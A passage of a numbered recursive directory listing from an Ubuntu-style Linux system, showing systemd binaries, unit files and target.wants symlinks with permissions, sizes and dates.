  840. -rwxr-xr-x 1 root root 1.6M Mar 8 2018 systemd
  841. -rwxr-xr-x 1 root root 47K Mar 8 2018 systemd-binfmt
  842. -rwxr-xr-x 1 root root 268K Mar 8 2018 systemd-cgroups-agent
  843. -rwxr-xr-x 1 root root 605K Mar 8 2018 systemd-logind
  844. -rwxr-xr-x 1 root root 657K Mar 8 2018 systemd-resolved
  845. -rwxr-xr-x 1 root root 143K Mar 8 2018 systemd-shutdown
  846. -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-sleep
  847. -rwxr-xr-x 1 root root 333K Mar 8 2018 systemd-timedated
  848. -rwxr-xr-x 1 root root 15K Mar 8 2018 systemd-ac-power
  849. -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-bootchart
  850. -rwxr-xr-x 1 root root 352K Mar 8 2018 systemd-bus-proxyd
  851. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-cryptsetup
  852. -rwxr-xr-x 1 root root 301K Mar 8 2018 systemd-fsck
  853. -rwxr-xr-x 1 root root 75K Mar 8 2018 systemd-fsckd
  854. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-hibernate-resume
  855. -rwxr-xr-x 1 root root 332K Mar 8 2018 systemd-hostnamed
  856. -rwxr-xr-x 1 root root 340K Mar 8 2018 systemd-localed
  857. -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-modules-load
  858. -rwxr-xr-x 1 root root 123K Mar 8 2018 systemd-networkd-wait-online
  859. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-random-seed
  860. -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-remount-fs
  861. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-reply-password
  862. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-socket-proxyd
  863. -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-sysctl
  864. -rwxr-xr-x 1 root root 139K Mar 8 2018 systemd-timesyncd
  865. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-user-sessions
  866. -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-activate
  867. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-backlight
  868. -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-initctl
  869. -rwxr-xr-x 1 root root 319K Mar 8 2018 systemd-journald
  870. -rwxr-xr-x 1 root root 836K Mar 8 2018 systemd-networkd
  871. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-quotacheck
  872. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-rfkill
  873. -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-update-utmp
  874. -rwxr-xr-x 1 root root 1.3K Feb 21 2018 systemd-sysv-install
  875.  
  876. /lib/systemd/system:
  877. total 1.1M
  878. lrwxrwxrwx 1 root root 9 Jun 22 2018 screen-cleanup.service -> /dev/null
  879. drwxr-xr-x 1 root root 42 Jun 22 2018 halt.target.wants
  880. drwxr-xr-x 1 root root 100 Jun 22 2018 initrd-switch-root.target.wants
  881. drwxr-xr-x 1 root root 44 Jun 22 2018 kexec.target.wants
  882. drwxr-xr-x 1 root root 376 Jun 22 2018 multi-user.target.wants
  883. drwxr-xr-x 1 root root 122 Jun 22 2018 poweroff.target.wants
  884. drwxr-xr-x 1 root root 118 Jun 22 2018 reboot.target.wants
  885. drwxr-xr-x 1 root root 1.4K Jun 22 2018 sysinit.target.wants
  886. drwxr-xr-x 1 root root 342 Jun 22 2018 sockets.target.wants
  887. drwxr-xr-x 1 root root 0 Jun 22 2018 busnames.target.wants
  888. drwxr-xr-x 1 root root 40 Jun 22 2018 getty.target.wants
  889. drwxr-xr-x 1 root root 72 Jun 22 2018 graphical.target.wants
  890. drwxr-xr-x 1 root root 52 Jun 22 2018 local-fs.target.wants
  891. drwxr-xr-x 1 root root 22 Jun 22 2018 rc-local.service.d
  892. drwxr-xr-x 1 root root 72 Jun 22 2018 rescue.target.wants
  893. drwxr-xr-x 1 root root 78 Jun 22 2018 resolvconf.service.wants
  894. drwxr-xr-x 1 root root 66 Jun 22 2018 sigpwr.target.wants
  895. drwxr-xr-x 1 root root 30 Jun 22 2018 systemd-resolved.service.d
  896. drwxr-xr-x 1 root root 58 Jun 22 2018 systemd-timesyncd.service.d
  897. drwxr-xr-x 1 root root 56 Jun 22 2018 timers.target.wants
  898. -rw-r--r-- 1 root root 309 May 30 2018 pollinate.service
  899. -rw-r--r-- 1 root root 246 May 24 2018 apport-forward.socket
  900. -rw-r--r-- 1 root root 252 May 17 2018 snapd.autoimport.service
  901. -rw-r--r-- 1 root root 320 May 17 2018 snapd.core-fixup.service
  902. -rw-r--r-- 1 root root 237 May 17 2018 snapd.seeded.service
  903. -rw-r--r-- 1 root root 308 May 17 2018 snapd.service
  904. -rw-r--r-- 1 root root 287 May 17 2018 snapd.snap-repair.service
  905. -rw-r--r-- 1 root root 281 May 17 2018 snapd.snap-repair.timer
  906. -rw-r--r-- 1 root root 281 May 17 2018 snapd.socket
  907. -rw-r--r-- 1 root root 474 May 17 2018 snapd.system-shutdown.service
  908. lrwxrwxrwx 1 root root 27 May 9 2018 plymouth-log.service -> plymouth-read-write.service
  909. lrwxrwxrwx 1 root root 21 May 9 2018 plymouth.service -> plymouth-quit.service
  910. -rw-r--r-- 1 root root 412 May 9 2018 plymouth-halt.service
  911. -rw-r--r-- 1 root root 426 May 9 2018 plymouth-kexec.service
  912. -rw-r--r-- 1 root root 421 May 9 2018 plymouth-poweroff.service
  913. -rw-r--r-- 1 root root 194 May 9 2018 plymouth-quit.service
  914. -rw-r--r-- 1 root root 200 May 9 2018 plymouth-quit-wait.service
  915. -rw-r--r-- 1 root root 244 May 9 2018 plymouth-read-write.service
  916. -rw-r--r-- 1 root root 416 May 9 2018 plymouth-reboot.service
  917. -rw-r--r-- 1 root root 532 May 9 2018 plymouth-start.service
  918. -rw-r--r-- 1 root root 291 May 9 2018 plymouth-switch-root.service
  919. -rw-r--r-- 1 root root 490 May 9 2018 systemd-ask-password-plymouth.path
  920. -rw-r--r-- 1 root root 467 May 9 2018 systemd-ask-password-plymouth.service
  921. -rw-r--r-- 1 root root 391 May 2 2018 cloud-config.service
  922. -rw-r--r-- 1 root root 482 May 2 2018 cloud-final.service
  923. -rw-r--r-- 1 root root 580 May 2 2018 cloud-init-local.service
  924. -rw-r--r-- 1 root root 642 May 2 2018 cloud-init.service
  925. -rw-r--r-- 1 root root 328 Apr 20 2018 open-vm-tools.service
  926. -rw-r--r-- 1 root root 536 Apr 3 2018 cloud-config.target
  927. -rw-r--r-- 1 root root 256 Apr 3 2018 cloud-init.target
  928. -rw-r--r-- 1 root root 298 Mar 22 2018 vgauth.service
  929. lrwxrwxrwx 1 root root 21 Mar 8 2018 udev.service -> systemd-udevd.service
  930. lrwxrwxrwx 1 root root 14 Mar 8 2018 autovt@.service -> getty@.service
  931. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogd.service -> /dev/null
  932. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogs.service -> /dev/null
  933. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootmisc.service -> /dev/null
  934. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkfs.service -> /dev/null
  935. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot-bootclean.service -> /dev/null
  936. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot.service -> /dev/null
  937. lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks-early.service -> /dev/null
  938. lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks.service -> /dev/null
  939. lrwxrwxrwx 1 root root 13 Mar 8 2018 ctrl-alt-del.target -> reboot.target
  940. lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
  941. lrwxrwxrwx 1 root root 23 Mar 8 2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service
  942. lrwxrwxrwx 1 root root 22 Mar 8 2018 dbus-org.freedesktop.login1.service -> systemd-logind.service
  943. lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.network1.service -> systemd-networkd.service
  944. lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
  945. lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
  946. lrwxrwxrwx 1 root root 16 Mar 8 2018 default.target -> graphical.target
  947. lrwxrwxrwx 1 root root 9 Mar 8 2018 fuse.service -> /dev/null
  948. lrwxrwxrwx 1 root root 9 Mar 8 2018 halt.service -> /dev/null
  949. lrwxrwxrwx 1 root root 9 Mar 8 2018 hostname.service -> /dev/null
  950. lrwxrwxrwx 1 root root 9 Mar 8 2018 hwclock.service -> /dev/null
  951. lrwxrwxrwx 1 root root 9 Mar 8 2018 killprocs.service -> /dev/null
  952. lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod.service -> systemd-modules-load.service
  953. lrwxrwxrwx 1 root root 28 Mar 8 2018 module-init-tools.service -> systemd-modules-load.service
  954. lrwxrwxrwx 1 root root 9 Mar 8 2018 motd.service -> /dev/null
  955. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall-bootclean.service -> /dev/null
  956. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall.service -> /dev/null
  957. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountdevsubfs.service -> /dev/null
  958. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountkernfs.service -> /dev/null
  959. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs-bootclean.service -> /dev/null
  960. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs.service -> /dev/null
  961. lrwxrwxrwx 1 root root 22 Mar 8 2018 procps.service -> systemd-sysctl.service
  962. lrwxrwxrwx 1 root root 16 Mar 8 2018 rc.local.service -> rc-local.service
  963. lrwxrwxrwx 1 root root 9 Mar 8 2018 rc.service -> /dev/null
  964. lrwxrwxrwx 1 root root 9 Mar 8 2018 rcS.service -> /dev/null
  965. lrwxrwxrwx 1 root root 9 Mar 8 2018 reboot.service -> /dev/null
  966. lrwxrwxrwx 1 root root 9 Mar 8 2018 rmnologin.service -> /dev/null
  967. lrwxrwxrwx 1 root root 15 Mar 8 2018 runlevel0.target -> poweroff.target
  968. lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel1.target -> rescue.target
  969. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel2.target -> multi-user.target
  970. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel3.target -> multi-user.target
  971. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel4.target -> multi-user.target
  972. lrwxrwxrwx 1 root root 16 Mar 8 2018 runlevel5.target -> graphical.target
  973. lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel6.target -> reboot.target
  974. lrwxrwxrwx 1 root root 9 Mar 8 2018 sendsigs.service -> /dev/null
  975. lrwxrwxrwx 1 root root 9 Mar 8 2018 single.service -> /dev/null
  976. lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd.service -> /dev/null
  977. lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd-single.service -> /dev/null
  978. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountfs.service -> /dev/null
  979. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountnfs.service -> /dev/null
  980. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountroot.service -> /dev/null
  981. lrwxrwxrwx 1 root root 27 Mar 8 2018 urandom.service -> systemd-random-seed.service
  982. lrwxrwxrwx 1 root root 9 Mar 8 2018 x11-common.service -> /dev/null
  983. -rw-r--r-- 1 root root 879 Mar 8 2018 basic.target
  984. -rw-r--r-- 1 root root 379 Mar 8 2018 bluetooth.target
  985. -rw-r--r-- 1 root root 358 Mar 8 2018 busnames.target
  986. -rw-r--r-- 1 root root 770 Mar 8 2018 console-getty.service
  987. -rw-r--r-- 1 root root 742 Mar 8 2018 console-shell.service
  988. -rw-r--r-- 1 root root 791 Mar 8 2018 container-getty@.service
  989. -rw-r--r-- 1 root root 394 Mar 8 2018 cryptsetup-pre.target
  990. -rw-r--r-- 1 root root 366 Mar 8 2018 cryptsetup.target
  991. -rw-r--r-- 1 root root 1010 Mar 8 2018 debug-shell.service
  992. -rw-r--r-- 1 root root 670 Mar 8 2018 dev-hugepages.mount
  993. -rw-r--r-- 1 root root 624 Mar 8 2018 dev-mqueue.mount
  994. -rw-r--r-- 1 root root 1009 Mar 8 2018 emergency.service
  995. -rw-r--r-- 1 root root 431 Mar 8 2018 emergency.target
  996. -rw-r--r-- 1 root root 501 Mar 8 2018 exit.target
  997. -rw-r--r-- 1 root root 440 Mar 8 2018 final.target
  998. -rw-r--r-- 1 root root 1.5K Mar 8 2018 getty@.service
  999. -rw-r--r-- 1 root root 460 Mar 8 2018 getty.target
  1000. -rw-r--r-- 1 root root 558 Mar 8 2018 graphical.target
  1001. -rw-r--r-- 1 root root 487 Mar 8 2018 halt.target
  1002. -rw-r--r-- 1 root root 447 Mar 8 2018 hibernate.target
  1003. -rw-r--r-- 1 root root 468 Mar 8 2018 hybrid-sleep.target
  1004. -rw-r--r-- 1 root root 630 Mar 8 2018 initrd-cleanup.service
  1005. -rw-r--r-- 1 root root 553 Mar 8 2018 initrd-fs.target
  1006. -rw-r--r-- 1 root root 790 Mar 8 2018 initrd-parse-etc.service
  1007. -rw-r--r-- 1 root root 526 Mar 8 2018 initrd-root-fs.target
  1008. -rw-r--r-- 1 root root 640 Mar 8 2018 initrd-switch-root.service
  1009. -rw-r--r-- 1 root root 691 Mar 8 2018 initrd-switch-root.target
  1010. -rw-r--r-- 1 root root 671 Mar 8 2018 initrd.target
  1011. -rw-r--r-- 1 root root 664 Mar 8 2018 initrd-udevadm-cleanup-db.service
  1012. -rw-r--r-- 1 root root 501 Mar 8 2018 kexec.target
  1013. -rw-r--r-- 1 root root 677 Mar 8 2018 kmod-static-nodes.service
  1014. -rw-r--r-- 1 root root 395 Mar 8 2018 local-fs-pre.target
  1015. -rw-r--r-- 1 root root 507 Mar 8 2018 local-fs.target
  1016. -rw-r--r-- 1 root root 405 Mar 8 2018 machine.slice
  1017. -rw-r--r-- 1 root root 473 Mar 8 2018 mail-transport-agent.target
  1018. -rw-r--r-- 1 root root 492 Mar 8 2018 multi-user.target
  1019. -rw-r--r-- 1 root root 464 Mar 8 2018 network-online.target
  1020. -rw-r--r-- 1 root root 461 Mar 8 2018 network-pre.target
  1021. -rw-r--r-- 1 root root 480 Mar 8 2018 network.target
  1022. -rw-r--r-- 1 root root 514 Mar 8 2018 nss-lookup.target
  1023. -rw-r--r-- 1 root root 473 Mar 8 2018 nss-user-lookup.target
  1024. -rw-r--r-- 1 root root 354 Mar 8 2018 paths.target
  1025. -rw-r--r-- 1 root root 552 Mar 8 2018 poweroff.target
  1026. -rw-r--r-- 1 root root 377 Mar 8 2018 printer.target
  1027. -rw-r--r-- 1 root root 693 Mar 8 2018 proc-sys-fs-binfmt_misc.automount
  1028. -rw-r--r-- 1 root root 603 Mar 8 2018 proc-sys-fs-binfmt_misc.mount
  1029. -rw-r--r-- 1 root root 568 Mar 8 2018 quotaon.service
  1030. -rw-r--r-- 1 root root 612 Mar 8 2018 rc-local.service
  1031. -rw-r--r-- 1 root root 543 Mar 8 2018 reboot.target
  1032. -rw-r--r-- 1 root root 396 Mar 8 2018 remote-fs-pre.target
  1033. -rw-r--r-- 1 root root 482 Mar 8 2018 remote-fs.target
  1034. -rw-r--r-- 1 root root 978 Mar 8 2018 rescue.service
  1035. -rw-r--r-- 1 root root 486 Mar 8 2018 rescue.target
  1036. -rw-r--r-- 1 root root 500 Mar 8 2018 rpcbind.target
  1037. -rw-r--r-- 1 root root 1.1K Mar 8 2018 serial-getty@.service
  1038. -rw-r--r-- 1 root root 402 Mar 8 2018 shutdown.target
  1039. -rw-r--r-- 1 root root 362 Mar 8 2018 sigpwr.target
  1040. -rw-r--r-- 1 root root 420 Mar 8 2018 sleep.target
  1041. -rw-r--r-- 1 root root 403 Mar 8 2018 -.slice
  1042. -rw-r--r-- 1 root root 409 Mar 8 2018 slices.target
  1043. -rw-r--r-- 1 root root 380 Mar 8 2018 smartcard.target
  1044. -rw-r--r-- 1 root root 356 Mar 8 2018 sockets.target
  1045. -rw-r--r-- 1 root root 380 Mar 8 2018 sound.target
  1046. -rw-r--r-- 1 root root 441 Mar 8 2018 suspend.target
  1047. -rw-r--r-- 1 root root 353 Mar 8 2018 swap.target
  1048. -rw-r--r-- 1 root root 715 Mar 8 2018 sys-fs-fuse-connections.mount
  1049. -rw-r--r-- 1 root root 518 Mar 8 2018 sysinit.target
  1050. -rw-r--r-- 1 root root 719 Mar 8 2018 sys-kernel-config.mount
  1051. -rw-r--r-- 1 root root 662 Mar 8 2018 sys-kernel-debug.mount
  1052. -rw-r--r-- 1 root root 1.3K Mar 8 2018 syslog.socket
  1053. -rw-r--r-- 1 root root 646 Mar 8 2018 systemd-ask-password-console.path
  1054. -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-ask-password-console.service
  1055. -rw-r--r-- 1 root root 574 Mar 8 2018 systemd-ask-password-wall.path
  1056. -rw-r--r-- 1 root root 681 Mar 8 2018 systemd-ask-password-wall.service
  1057. -rw-r--r-- 1 root root 724 Mar 8 2018 systemd-backlight@.service
  1058. -rw-r--r-- 1 root root 959 Mar 8 2018 systemd-binfmt.service
  1059. -rw-r--r-- 1 root root 650 Mar 8 2018 systemd-bootchart.service
  1060. -rw-r--r-- 1 root root 1.0K Mar 8 2018 systemd-bus-proxyd.service
  1061. -rw-r--r-- 1 root root 409 Mar 8 2018 systemd-bus-proxyd.socket
  1062. -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-exit.service
  1063. -rw-r--r-- 1 root root 551 Mar 8 2018 systemd-fsckd.service
  1064. -rw-r--r-- 1 root root 540 Mar 8 2018 systemd-fsckd.socket
  1065. -rw-r--r-- 1 root root 674 Mar 8 2018 systemd-fsck-root.service
  1066. -rw-r--r-- 1 root root 648 Mar 8 2018 systemd-fsck@.service
  1067. -rw-r--r-- 1 root root 544 Mar 8 2018 systemd-halt.service
  1068. -rw-r--r-- 1 root root 631 Mar 8 2018 systemd-hibernate-resume@.service
  1069. -rw-r--r-- 1 root root 501 Mar 8 2018 systemd-hibernate.service
  1070. -rw-r--r-- 1 root root 710 Mar 8 2018 systemd-hostnamed.service
  1071. -rw-r--r-- 1 root root 778 Mar 8 2018 systemd-hwdb-update.service
  1072. -rw-r--r-- 1 root root 519 Mar 8 2018 systemd-hybrid-sleep.service
  1073. -rw-r--r-- 1 root root 480 Mar 8 2018 systemd-initctl.service
  1074. -rw-r--r-- 1 root root 524 Mar 8 2018 systemd-initctl.socket
  1075. -rw-r--r-- 1 root root 607 Mar 8 2018 systemd-journald-audit.socket
  1076. -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-journald-dev-log.socket
  1077. -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-journald.service
  1078. -rw-r--r-- 1 root root 842 Mar 8 2018 systemd-journald.socket
  1079. -rw-r--r-- 1 root root 731 Mar 8 2018 systemd-journal-flush.service
  1080. -rw-r--r-- 1 root root 557 Mar 8 2018 systemd-kexec.service
  1081. -rw-r--r-- 1 root root 691 Mar 8 2018 systemd-localed.service
  1082. -rw-r--r-- 1 root root 1.2K Mar 8 2018 systemd-logind.service
  1083. -rw-r--r-- 1 root root 693 Mar 8 2018 systemd-machine-id-commit.service
  1084. -rw-r--r-- 1 root root 967 Mar 8 2018 systemd-modules-load.service
  1085. -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-networkd.service
  1086. -rw-r--r-- 1 root root 591 Mar 8 2018 systemd-networkd.socket
  1087. -rw-r--r-- 1 root root 685 Mar 8 2018 systemd-networkd-wait-online.service
  1088. -rw-r--r-- 1 root root 553 Mar 8 2018 systemd-poweroff.service
  1089. -rw-r--r-- 1 root root 614 Mar 8 2018 systemd-quotacheck.service
  1090. -rw-r--r-- 1 root root 717 Mar 8 2018 systemd-random-seed.service
  1091. -rw-r--r-- 1 root root 548 Mar 8 2018 systemd-reboot.service
  1092. -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-remount-fs.service
  1093. -rw-r--r-- 1 root root 907 Mar 8 2018 systemd-resolved.service
  1094. -rw-r--r-- 1 root root 696 Mar 8 2018 systemd-rfkill.service
  1095. -rw-r--r-- 1 root root 617 Mar 8 2018 systemd-rfkill.socket
  1096. -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-suspend.service
  1097. -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-sysctl.service
  1098. -rw-r--r-- 1 root root 655 Mar 8 2018 systemd-timedated.service
  1099. -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-timesyncd.service
  1100. -rw-r--r-- 1 root root 598 Mar 8 2018 systemd-tmpfiles-clean.service
  1101. -rw-r--r-- 1 root root 450 Mar 8 2018 systemd-tmpfiles-clean.timer
  1102. -rw-r--r-- 1 root root 703 Mar 8 2018 systemd-tmpfiles-setup-dev.service
  1103. -rw-r--r-- 1 root root 683 Mar 8 2018 systemd-tmpfiles-setup.service
  1104. -rw-r--r-- 1 root root 578 Mar 8 2018 systemd-udevd-control.socket
  1105. -rw-r--r-- 1 root root 570 Mar 8 2018 systemd-udevd-kernel.socket
  1106. -rw-r--r-- 1 root root 825 Mar 8 2018 systemd-udevd.service
  1107. -rw-r--r-- 1 root root 823 Mar 8 2018 systemd-udev-settle.service
  1108. -rw-r--r-- 1 root root 743 Mar 8 2018 systemd-udev-trigger.service
  1109. -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-update-utmp-runlevel.service
  1110. -rw-r--r-- 1 root root 754 Mar 8 2018 systemd-update-utmp.service
  1111. -rw-r--r-- 1 root root 573 Mar 8 2018 systemd-user-sessions.service
  1112. -rw-r--r-- 1 root root 436 Mar 8 2018 system.slice
  1113. -rw-r--r-- 1 root root 585 Mar 8 2018 system-update.target
  1114. -rw-r--r-- 1 root root 405 Mar 8 2018 timers.target
  1115. -rw-r--r-- 1 root root 395 Mar 8 2018 time-sync.target
  1116. -rw-r--r-- 1 root root 417 Mar 8 2018 umount.target
  1117. -rw-r--r-- 1 root root 528 Mar 8 2018 user@.service
  1118. -rw-r--r-- 1 root root 392 Mar 8 2018 user.slice
  1119. -rw-r--r-- 1 root root 225 Mar 6 2018 apt-daily.service
  1120. -rw-r--r-- 1 root root 156 Mar 6 2018 apt-daily.timer
  1121. -rw-r--r-- 1 root root 238 Mar 6 2018 apt-daily-upgrade.service
  1122. -rw-r--r-- 1 root root 184 Mar 6 2018 apt-daily-upgrade.timer
  1123. -rw-r--r-- 1 root root 342 Feb 21 2018 getty-static.service
  1124. -rw-r--r-- 1 root root 153 Feb 21 2018 sigpwr-container-shutdown.service
  1125. -rw-r--r-- 1 root root 175 Feb 21 2018 systemd-networkd-resolvconf-update.path
  1126. -rw-r--r-- 1 root root 715 Feb 21 2018 systemd-networkd-resolvconf-update.service
  1127. -rw-r--r-- 1 root root 683 Dec 7 2017 lxd.service
  1128. -rw-r--r-- 1 root root 206 Dec 7 2017 lxd-bridge.service
  1129. -rw-r--r-- 1 root root 318 Dec 7 2017 lxd-containers.service
  1130. -rw-r--r-- 1 root root 197 Dec 7 2017 lxd.socket
  1131. -rw-r--r-- 1 root root 189 Nov 30 2017 uuidd.service
  1132. -rw-r--r-- 1 root root 126 Nov 30 2017 uuidd.socket
  1133. -rw-r--r-- 1 root root 420 Nov 29 2017 resolvconf.service
  1134. -rw-r--r-- 1 root root 311 Nov 9 2017 lxcfs.service
  1135. -rw-r--r-- 1 root root 670 Nov 8 2017 mdadm-shutdown.service
  1136. -rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service
  1137. -rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service
  1138. -rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service
  1139. -rw-r--r-- 1 root root 216 Mar 16 2017 ssh.socket
  1140. -rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
  1141. -rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
  1142. -rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
  1143. -rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
  1144. -rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
  1145. -rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
  1146. -rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
  1147. -rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
  1148. lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
  1149. -rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
  1150. -rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
  1151. -rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
  1152. -rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
  1153. -rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
  1154. -rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
  1155. -rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
  1156. -rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
  1157. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel1.target.wants
  1158. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel2.target.wants
  1159. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel3.target.wants
  1160. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel4.target.wants
  1161. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel5.target.wants
  1162. -rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service
  1163. -rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
  1164. -rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
  1165. -rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
  1166. -rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
  1167. -rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
  1168. -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket
  1169. -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
  1170. -rw-r--r-- 1 root root 169 Jan 14 2016 atd.service
  1171. -rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
  1172. -rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
  1173. -rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
  1174. -rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
  1175. -rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
  1176. -rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
  1177. -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service
  1178.  
  1179. /lib/systemd/system/halt.target.wants:
  1180. total 4.0K
  1181. lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-halt.service -> ../plymouth-halt.service
  1182.  
  1183. /lib/systemd/system/initrd-switch-root.target.wants:
  1184. total 8.0K
  1185. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
  1186. lrwxrwxrwx 1 root root 31 May 9 2018 plymouth-switch-root.service -> ../plymouth-switch-root.service
  1187.  
  1188. /lib/systemd/system/kexec.target.wants:
  1189. total 4.0K
  1190. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-kexec.service -> ../plymouth-kexec.service
  1191.  
  1192. /lib/systemd/system/multi-user.target.wants:
  1193. total 32K
  1194. lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-quit.service -> ../plymouth-quit.service
  1195. lrwxrwxrwx 1 root root 29 May 9 2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
  1196. lrwxrwxrwx 1 root root 15 Mar 8 2018 getty.target -> ../getty.target
  1197. lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
  1198. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-logind.service -> ../systemd-logind.service
  1199. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
  1200. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-user-sessions.service -> ../systemd-user-sessions.service
  1201. lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
  1202.  
  1203. /lib/systemd/system/poweroff.target.wants:
  1204. total 8.0K
  1205. lrwxrwxrwx 1 root root 28 May 9 2018 plymouth-poweroff.service -> ../plymouth-poweroff.service
  1206. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
  1207.  
  1208. /lib/systemd/system/reboot.target.wants:
  1209. total 8.0K
  1210. lrwxrwxrwx 1 root root 26 May 9 2018 plymouth-reboot.service -> ../plymouth-reboot.service
  1211. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
  1212.  
  1213. /lib/systemd/system/sysinit.target.wants:
  1214. total 108K
  1215. lrwxrwxrwx 1 root root 30 May 9 2018 plymouth-read-write.service -> ../plymouth-read-write.service
  1216. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
